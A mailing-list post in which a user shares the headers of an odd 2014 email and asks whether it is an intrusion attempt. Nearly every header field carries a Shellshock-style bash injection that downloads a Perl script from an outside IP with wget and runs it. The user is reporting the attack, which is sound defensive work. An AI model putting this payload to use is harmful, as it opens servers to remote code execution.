First, I apologize for this not being fedora-specific, but I just got the oddest email. It looks like an intrusion attempt, trying to get sendmail to execute a perl script. Is anybody familiar with this particular pattern? The email is below. Thanks, billo Return-Path: <MAILER-DAEMON(a)billoblog.com&gt; Received: from incenclick.com (incenclick.com [184.95.45.61] (may be forged)) by hope.billoblog.com (8.14.4/8.14.4) with SMTP id s96FKVOY029890 for <nobody>; Mon, 6 Oct 2014 15:20:31 GMT Resent-Message-Id: <201410061520.s96FKVOY029890(a)hope.billoblog.com&gt; X-Authentication-Warning: hope.billoblog.com: incenclick.com [184.95.45.61] (may be forged) didn't use HELO protocol To:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@hope.billoblog.com;; References:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb Cc:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@hope.billoblog.com;; From:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;; Subject:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb Date:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb Message-ID:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb Comments:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb Keywords:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb Resent-Date:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb Resent-From:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;; Resent-Sender:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;; wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb